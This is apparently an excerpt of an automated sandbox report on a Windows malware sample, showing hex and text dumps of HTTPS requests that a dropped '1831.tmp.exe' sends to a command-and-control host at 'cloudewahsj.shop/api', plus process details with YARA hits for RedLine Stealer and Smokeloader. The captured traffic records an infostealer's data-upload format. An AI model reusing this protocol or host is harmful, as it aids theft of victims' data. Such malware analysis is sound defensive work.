                                                                                                  Data Ascii: 24c2aWv5TmfDAlJgjlVSp+1cjLGYl+uzdan2wHindQhDoLwSSY9sXfcucBPrd2jTnynpnbr2j5FPz5esC8JZKjXNnlMNmCIUpi5wBfZ3aPyWfunfuq3J1h/Ll6waxh5nM8zfAQeeJgKgZjMM4zA3wow24tj1/4aRWYuTulqdV0Um1N0kCoolRb4uKULrO3Cdzz3p0/Txj9gdwZ6kG8MfeCrG1AEJnScIqXI+BuQ7MciMfqCT/e3JiVeY
                                                                                                  2025-01-05 07:59:24 UTC1369INData Raw: 70 71 45 4c 31 41 4a 6e 4d 63 53 65 46 45 65 43 62 41 4b 74 49 47 68 43 35 44 73 2b 77 49 77 78 36 64 4c 36 35 34 62 52 46 4d 4f 63 70 68 44 4b 47 47 55 76 79 4e 6b 44 41 4a 77 6a 41 71 6c 6d 50 77 47 73 65 58 44 43 6c 33 36 32 6b 39 72 6c 69 74 49 44 78 6f 58 69 42 59 73 4f 4b 69 62 4f 6e 6c 4e 4a 6e 53 49 45 72 47 41 69 43 75 63 38 4e 64 65 45 4e 2b 50 65 2b 76 69 44 33 68 54 4c 6b 36 67 51 79 68 31 75 4c 4d 2f 59 43 77 6e 62 59 6b 57 6d 65 48 42 61 72 42 51 31 31 59 67 79 2b 4a 48 41 74 5a 61 66 44 6f 75 54 72 6c 71 64 56 32 49 6b 77 64 30 41 42 70 67 6b 44 72 4e 67 49 67 54 68 4d 69 4c 44 69 6a 44 6b 30 4f 6a 2f 68 39 63 55 77 70 2b 72 48 38 49 54 4b 6d 2b 43 32 52 4e 4a 77 32 77 6b 72 47 73 38 43 50 73 33 63 4e 72 42 4a 36 37 55 39 72 58 52 6b 52 50
                                                                                                  Data Ascii: pqEL1AJnMcSeFEeCbAKtIGhC5Ds+wIwx6dL654bRFMOcphDKGGUvyNkDAJwjAqlmPwGseXDCl362k9rlitIDxoXiBYsOKibOnlNJnSIErGAiCuc8NdeEN+Pe+viD3hTLk6gQyh1uLM/YCwnbYkWmeHBarBQ11Ygy+JHAtZafDouTrlqdV2Ikwd0ABpgkDrNgIgThMiLDijDk0Oj/h9cUwp+rH8ITKm+C2RNJw2wkrGs8CPs3cNrBJ67U9rXRkRP
                                                                                                  2025-01-05 07:59:24 UTC1369INData Raw: 49 55 51 63 6d 47 61 6e 69 45 4b 6a 79 38 50 34 31 55 7a 44 4f 49 77 4a 6f 57 51 63 50 65 54 2f 66 6e 4a 69 56 66 47 6c 61 6f 63 31 78 68 6e 49 73 7a 51 42 41 79 55 4a 41 57 68 62 54 55 47 35 7a 77 7a 79 49 73 73 35 4e 50 79 38 49 6a 62 48 59 76 61 34 68 33 64 56 7a 4a 68 38 38 6b 41 53 36 34 76 43 36 39 6e 4a 6b 4c 7a 65 53 6d 46 69 44 4b 75 69 37 72 34 67 64 51 53 78 4a 57 6f 46 4d 41 64 5a 69 6e 4d 33 52 6b 47 6e 79 77 4a 71 57 6f 39 44 4f 67 2f 4f 63 36 45 4f 4f 37 53 38 4c 58 48 6b 52 44 54 31 50 70 61 38 52 42 6d 4c 4d 32 63 50 67 71 56 49 67 4b 33 49 43 39 4d 39 58 63 33 79 63 39 6d 72 74 2f 7a 39 59 4c 62 45 38 75 54 72 78 2f 47 45 47 6b 73 78 64 51 46 44 70 38 67 44 4b 78 6d 4d 41 58 6f 4d 69 4c 41 68 6a 4c 69 6b 37 53 31 6a 73 6c 58 6b 39 53 4e
                                                                                                  Data Ascii: IUQcmGaniEKjy8P41UzDOIwJoWQcPeT/fnJiVfGlaoc1xhnIszQBAyUJAWhbTUG5zwzyIss5NPy8IjbHYva4h3dVzJh88kAS64vC69nJkLzeSmFiDKui7r4gdQSxJWoFMAdZinM3RkGnywJqWo9DOg/Oc6EOO7S8LXHkRDT1Ppa8RBmLM2cPgqVIgK3IC9M9Xc3yc9mrt/z9YLbE8uTrx/GEGksxdQFDp8gDKxmMAXoMiLAhjLik7S1jslXk9SN
                                                                                                  2025-01-05 07:59:24 UTC1369INData Raw: 4a 68 79 39 63 5a 42 35 55 6c 43 4b 64 6f 4e 77 7a 68 50 44 62 4f 69 44 6e 6f 33 76 4c 34 6a 4e 49 57 7a 35 36 77 47 63 34 64 5a 79 75 43 6b 45 73 4f 67 32 78 64 34 55 63 38 4b 2f 77 73 49 74 50 50 49 61 44 4b 75 76 4b 46 6b 55 2b 4c 6c 36 30 54 79 68 39 69 4c 73 33 61 42 51 2b 64 49 51 43 75 61 69 49 4b 34 6a 6f 37 79 6f 51 73 37 74 37 2b 2b 59 33 5a 48 4d 48 55 37 46 72 43 44 79 70 35 67 75 73 47 42 70 73 76 45 2b 46 2f 66 68 75 73 4d 44 79 46 31 33 37 69 33 66 72 36 68 64 30 63 77 35 57 75 46 4d 49 53 59 79 6e 4b 7a 41 6f 4e 6b 79 30 4c 72 6d 45 30 42 2b 6b 7a 4e 38 47 4a 4d 61 36 64 75 76 4b 52 6b 55 2b 4c 75 34 55 76 68 7a 5a 51 59 64 32 51 45 6b 6d 63 49 45 58 35 49 44 77 42 34 44 38 2f 77 34 59 79 35 4e 72 78 2b 59 4c 56 47 38 4b 52 70 42 76 41 45
                                                                                                  Data Ascii: Jhy9cZB5UlCKdoNwzhPDbOiDno3vL4jNIWz56wGc4dZyuCkEsOg2xd4Uc8K/wsItPPIaDKuvKFkU+Ll60Tyh9iLs3aBQ+dIQCuaiIK4jo7yoQs7t7++Y3ZHMHU7FrCDyp5gusGBpsvE+F/fhusMDyF137i3fr6hd0cw5WuFMISYynKzAoNky0LrmE0B+kzN8GJMa6duvKRkU+Lu4UvhzZQYd2QEkmcIEX5IDwB4D8/w4Yy5Nrx+YLVG8KRpBvAE
                                                                                                  2025-01-05 07:59:24 UTC1369INData Raw: 58 47 51 65 57 49 77 32 70 61 54 45 47 36 54 6f 32 79 59 55 2f 36 64 33 30 2f 63 6d 66 56 38 79 4d 34 6b 4b 46 4e 6e 6f 36 30 4d 67 47 4b 4a 59 6a 52 62 34 75 4b 55 4c 72 4f 33 43 64 7a 7a 66 38 31 2f 66 6e 67 4e 59 5a 78 4a 65 77 47 38 67 63 65 43 62 4e 32 67 77 46 6e 53 4d 44 6f 47 55 36 44 75 73 79 4f 38 71 44 66 71 43 54 2f 65 33 4a 69 56 66 6c 6e 37 45 4e 78 68 6c 68 4e 39 6d 65 46 45 65 43 62 41 4b 74 49 47 68 43 37 7a 77 37 77 59 38 79 37 74 66 33 39 5a 76 65 45 4d 79 64 71 51 6a 50 45 47 30 71 79 74 55 45 44 34 6b 67 43 37 4e 6c 49 68 43 73 65 58 44 43 6c 33 36 32 6b 38 7a 79 6d 63 45 55 69 61 57 30 47 64 4d 63 5a 79 32 43 77 55 55 51 32 79 73 4a 34 54 68 77 42 4f 4d 2b 4d 38 71 4f 4e 2b 4c 65 2f 2f 79 4d 30 42 48 50 6e 71 67 61 77 78 46 72 4a 4d
                                                                                                  Data Ascii: XGQeWIw2paTEG6To2yYU/6d30/cmfV8yM4kKFNno60MgGKJYjRb4uKULrO3Cdzzf81/fngNYZxJewG8gceCbN2gwFnSMDoGU6DusyO8qDfqCT/e3JiVfln7ENxhlhN9meFEeCbAKtIGhC7zw7wY8y7tf39ZveEMydqQjPEG0qytUED4kgC7NlIhCseXDCl362k8zymcEUiaW0GdMcZy2CwUUQ2ysJ4ThwBOM+M8qON+Le//yM0BHPnqgawxFrJM
                                                                                                  2025-01-05 07:59:24 UTC1369INData Raw: 6c 32 78 64 34 57 4d 33 41 65 30 39 4f 63 6d 41 4f 65 72 42 38 50 4b 62 30 42 62 41 6d 61 34 61 79 42 70 67 49 4d 76 54 42 77 53 63 4b 77 71 6b 49 48 35 43 36 79 39 77 6e 63 38 66 34 39 6a 32 72 74 4f 52 43 49 57 4e 34 68 33 4a 56 7a 4a 68 77 74 51 4f 41 35 59 76 43 71 4a 79 4d 51 54 2b 4e 7a 33 50 6e 54 54 6c 31 76 66 34 68 4e 49 52 7a 5a 2b 75 43 4d 77 58 61 53 71 43 6b 45 73 4f 67 32 78 64 34 55 4d 6e 46 4f 59 77 50 4e 4f 45 50 2b 33 46 39 2b 58 4a 6e 31 66 61 6b 37 4e 61 6e 51 46 36 4e 73 58 42 52 52 44 62 4b 77 6e 68 4f 48 41 45 35 54 45 33 77 34 45 73 36 39 58 31 2b 6f 44 59 45 38 4f 58 6f 68 37 42 45 47 38 69 7a 74 55 4d 43 70 51 6f 44 4b 39 70 50 30 4b 69 64 7a 66 64 7a 32 61 75 38 75 48 32 68 64 78 58 31 4e 71 37 57 73 49 62 4b 6e 6d 43 30 67 55
                                                                                                  Data Ascii: l2xd4WM3Ae09OcmAOerB8PKb0BbAma4ayBpgIMvTBwScKwqkIH5C6y9wnc8f49j2rtORCIWN4h3JVzJhwtQOA5YvCqJyMQT+Nz3PnTTl1vf4hNIRzZ+uCMwXaSqCkEsOg2xd4UMnFOYwPNOEP+3F9+XJn1fak7NanQF6NsXBRRDbKwnhOHAE5TE3w4Es69X1+oDYE8OXoh7BEG8iztUMCpQoDK9pP0Kidzfdz2au8uH2hdxX1Nq7WsIbKnmC0gU
                                                                                                  2025-01-05 07:59:24 UTC1369INData Raw: 36 52 6e 4a 6b 44 5a 4e 44 37 4c 69 43 69 75 7a 4d 57 37 79 64 42 58 6b 36 32 37 57 74 4e 58 4d 6e 4f 4d 6e 68 6c 4a 77 32 78 43 6f 6e 49 69 42 4f 38 68 4d 34 4b 78 41 4d 6e 46 38 50 4b 5a 31 67 44 45 31 4f 78 61 79 6c 63 79 47 49 4c 58 44 42 4b 4b 4f 67 69 78 5a 33 41 39 6f 6e 63 6f 68 64 64 2b 32 39 44 30 2b 34 37 48 42 6f 61 7a 74 42 44 43 42 32 30 32 7a 5a 35 46 53 5a 31 73 58 66 49 75 63 41 62 39 64 32 69 56 33 57 57 37 67 4b 32 6c 32 38 35 5a 30 74 53 30 57 70 31 46 4a 47 48 51 6e 6c 4e 4a 33 43 38 58 73 32 59 7a 46 4f 39 77 44 76 75 6f 4a 4f 50 56 37 65 53 33 37 78 44 52 6d 61 51 4e 31 46 74 2f 49 73 7a 51 44 42 2f 62 59 6b 57 75 49 47 67 37 72 48 39 77 2b 73 46 2b 39 70 4f 69 74 62 7a 53 47 63 57 54 74 41 75 49 4d 48 41 73 78 4d 6b 61 53 64 56 73
                                                                                                  Data Ascii: 6RnJkDZND7LiCiuzMW7ydBXk627WtNXMnOMnhlJw2xConIiBO8hM4KxAMnF8PKZ1gDE1OxaylcyGILXDBKKOgixZ3A9oncohdd+29D0+47HBoaztBDCB202zZ5FSZ1sXfIucAb9d2iV3WW7gK2l285Z0tS0Wp1FJGHQnlNJ3C8Xs2YzFO9wDvuoJOPV7eS37xDRmaQN1Ft/IszQDB/bYkWuIGg7rH9w+sF+9pOitbzSGcWTtAuIMHAsxMkaSdVs
                                                                                                  2025-01-05 07:59:24 UTC954INData Raw: 49 51 36 6a 51 6d 78 73 67 41 30 50 54 30 38 6f 6a 48 42 39 79 62 6e 43 54 51 46 47 51 76 78 63 67 61 53 64 56 73 43 75 45 34 43 55 4b 6b 64 77 2b 4c 7a 79 61 75 69 37 72 41 69 74 38 5a 7a 49 4b 7a 56 2b 49 5a 62 53 44 55 7a 68 77 47 32 32 4a 46 70 79 42 6f 55 4b 4a 33 4e 4e 54 50 5a 72 36 42 6f 61 44 61 68 6b 65 5a 69 2b 77 44 68 51 45 71 65 5a 43 51 53 78 76 62 64 45 58 6d 59 79 49 51 36 6a 51 6d 78 73 67 41 30 50 54 30 38 6f 6a 48 42 39 79 62 37 54 54 7a 4e 6c 51 66 31 39 30 46 42 35 77 36 46 4f 45 75 63 41 32 73 62 77 6d 46 78 33 37 52 6e 62 72 74 79 59 6c 58 2f 70 65 73 46 4d 49 42 65 32 7a 6c 30 41 77 49 6a 54 77 53 72 69 38 65 4e 4d 31 33 66 6f 57 4a 66 72 61 42 74 4c 57 4e 77 46 65 54 78 50 42 42 6b 45 51 39 63 5a 44 42 52 52 44 62 4f 6b 58 35 4d
                                                                                                  Data Ascii: IQ6jQmxsgA0PT08ojHB9ybnCTQFGQvxcgaSdVsCuE4CUKkdw+Lzyaui7rAit8ZzIKzV+IZbSDUzhwG22JFpyBoUKJ3NNTPZr6BoaDahkeZi+wDhQEqeZCQSxvbdEXmYyIQ6jQmxsgA0PT08ojHB9yb7TTzNlQf190FB5w6FOEucA2sbwmFx37RnbrtyYlX/pesFMIBe2zl0AwIjTwSri8eNM13foWJfraBtLWNwFeTxPBBkEQ9cZDBRRDbOkX5M
                                                                                                  2025-01-05 07:59:24 UTC1369INData Raw: 32 37 63 65 0d 0a 71 74 79 5a 59 5a 78 70 57 68 46 4d 59 46 65 43 66 42 79 41 68 4f 70 52 49 67 72 47 30 31 44 4f 73 4a 44 75 53 46 4c 75 50 63 2f 63 75 33 35 67 62 4d 68 4f 41 38 78 67 46 70 59 59 79 65 45 30 6e 44 62 43 53 72 63 44 30 4e 36 33 64 2b 68 59 74 2b 74 70 50 66 2b 49 54 55 47 63 7a 57 67 78 44 56 47 6d 55 6d 67 70 42 4c 42 64 74 30 52 61 42 71 49 41 2f 6a 4d 48 7a 43 6c 54 6d 75 6e 62 72 37 79 59 6c 58 79 70 36 79 46 38 6f 51 4a 69 66 4d 30 45 73 57 31 54 56 46 74 79 42 6f 55 61 4a 33 49 6f 58 58 66 71 6e 64 39 2f 53 4b 33 78 54 5a 68 71 51 5a 30 78 51 74 48 2f 7a 37 42 67 53 65 49 67 4b 66 58 68 45 49 2f 44 6f 2f 77 73 30 65 36 63 58 35 79 37 66 6d 42 73 79 45 34 44 7a 47 41 57 6c 68 6a 4a 34 54 53 63 4e 73 4a 4b 74 77 50 51 33 72 64 52 44
                                                                                                  Data Ascii: 27ceqtyZYZxpWhFMYFeCfByAhOpRIgrG01DOsJDuSFLuPc/cu35gbMhOA8xgFpYYyeE0nDbCSrcD0N63d+hYt+tpPf+ITUGczWgxDVGmUmgpBLBdt0RaBqIA/jMHzClTmunbr7yYlXyp6yF8oQJifM0EsW1TVFtyBoUaJ3IoXXfqnd9/SK3xTZhqQZ0xQtH/z7BgSeIgKfXhEI/Do/ws0e6cX5y7fmBsyE4DzGAWlhjJ4TScNsJKtwPQ3rdRD


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.549708104.21.112.14436556C:\Users\user\AppData\Local\Temp\1831.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:59:25 UTC274OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=1UHHTO75RA
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 12782
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:59:25 UTC12782OUTData Raw: 2d 2d 31 55 48 48 54 4f 37 35 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 38 39 34 38 44 42 44 31 32 38 30 33 38 36 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 31 55 48 48 54 4f 37 35 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 55 48 48 54 4f 37 35 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 31 55 48 48 54 4f 37 35 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                  Data Ascii: --1UHHTO75RAContent-Disposition: form-data; name="hwid"EF8948DBD1280386822D1F4978021086--1UHHTO75RAContent-Disposition: form-data; name="pid"2--1UHHTO75RAContent-Disposition: form-data; name="lid"4h5VfH----1UHHTO75RAContent-Dispo
                                                                                                  2025-01-05 07:59:26 UTC1124INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:59:26 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=cfbnbth2rhua6rktaojs4au5jl; expires=Thu, 01 May 2025 01:46:05 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0a%2FeWTfvWq2dbOGsnVP8aMq%2B9vXTFYhDLRhwQCzfV7AO1X9UO7R25aCFNx1%2Bei9VsuVtyp0Z1iiamQ9AMVgcOBzG2KvlzU7yFCMpyqYwPaqiaXoZcB5C3Qcqijr3ftaZV6rb"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1edca6c14424b-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1584&rtt_var=600&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13714&delivery_rate=1814791&cwnd=248&unsent_bytes=0&cid=04b79bf68bb5835c&ts=883&x=0"
                                                                                                  2025-01-05 07:59:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-05 07:59:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.549709104.21.112.14436556C:\Users\user\AppData\Local\Temp\1831.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:59:27 UTC280OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=9CIY2GISK9V00UOM
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 15060
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:59:27 UTC15060OUTData Raw: 2d 2d 39 43 49 59 32 47 49 53 4b 39 56 30 30 55 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 38 39 34 38 44 42 44 31 32 38 30 33 38 36 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 39 43 49 59 32 47 49 53 4b 39 56 30 30 55 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 43 49 59 32 47 49 53 4b 39 56 30 30 55 4f 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 39 43 49 59 32 47 49
                                                                                                  Data Ascii: --9CIY2GISK9V00UOMContent-Disposition: form-data; name="hwid"EF8948DBD1280386822D1F4978021086--9CIY2GISK9V00UOMContent-Disposition: form-data; name="pid"2--9CIY2GISK9V00UOMContent-Disposition: form-data; name="lid"4h5VfH----9CIY2GI
                                                                                                  2025-01-05 07:59:28 UTC1126INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:59:27 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=p1lk805loa70khrncng4v3ks0o; expires=Thu, 01 May 2025 01:46:06 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SB2PwBsGDLu%2F6ee2H2R5AKjhrLCGR6UowRhavYE3LpiiIcanb1avwvxYGsWvEMR3Ccvj5FSziHGRiIFg3NnQ%2Fz2cdc3fG%2Bo%2FikfRP5H1bsVp5n9Rmb3wQod5IjRF7zhvoOy"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1edd46aea43b3-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1549&rtt_var=593&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15998&delivery_rate=1827284&cwnd=203&unsent_bytes=0&cid=82a6a9c0edd04c69&ts=533&x=0"
                                                                                                  2025-01-05 07:59:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-05 07:59:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.549710104.21.112.14436556C:\Users\user\AppData\Local\Temp\1831.tmp.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-05 07:59:28 UTC275OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=JRXDVKEB4T0
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 20520
                                                                                                  Host: cloudewahsj.shop
                                                                                                  2025-01-05 07:59:28 UTC15331OUTData Raw: 2d 2d 4a 52 58 44 56 4b 45 42 34 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 46 38 39 34 38 44 42 44 31 32 38 30 33 38 36 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 4a 52 58 44 56 4b 45 42 34 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4a 52 58 44 56 4b 45 42 34 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4a 52 58 44 56 4b 45 42 34 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                  Data Ascii: --JRXDVKEB4T0Content-Disposition: form-data; name="hwid"EF8948DBD1280386822D1F4978021086--JRXDVKEB4T0Content-Disposition: form-data; name="pid"3--JRXDVKEB4T0Content-Disposition: form-data; name="lid"4h5VfH----JRXDVKEB4T0Content-D
                                                                                                  2025-01-05 07:59:28 UTC5189OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: un 4F([:7s~X`nO`i
                                                                                                  2025-01-05 07:59:29 UTC1124INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 05 Jan 2025 07:59:29 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=ihic9n1gsg8tjm8nvm2s2smm06; expires=Thu, 01 May 2025 01:46:08 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vz45BZh3yZ3da53bXk2jq9rGOrlMzBzKTU6KPZfzeeexMMl%2BRaur52AOp9GRwLegWOKn4lbQWdEiz5W8xWZyMBrMrgdxBv9Hom5blwaWL6hYV6VuQKqorJ4W3lgRsU%2BACa3K"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fd1eddd4882424b-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1563&rtt_var=594&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21475&delivery_rate=1830721&cwnd=248&unsent_bytes=0&cid=47cdc9283ad99225&ts=1018&x=0"
                                                                                                  2025-01-05 07:59:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-05 07:59:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:02:59:17
                                                                                                  Start date:05/01/2025
                                                                                                  Path:C:\Users\user\Desktop\K27Yg4V48M.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\K27Yg4V48M.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:374'272 bytes
                                                                                                  MD5 hash:C1FDBF911E07304172569387F99A2ADF
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4481462096.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low
                                                                                                  Has exited:false

                                                                                                  Target ID:2
                                                                                                  Start time:02:59:21
                                                                                                  Start date:05/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1831.tmp.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\1831.tmp.exe"
                                                                                                  Imagebase:0x400000
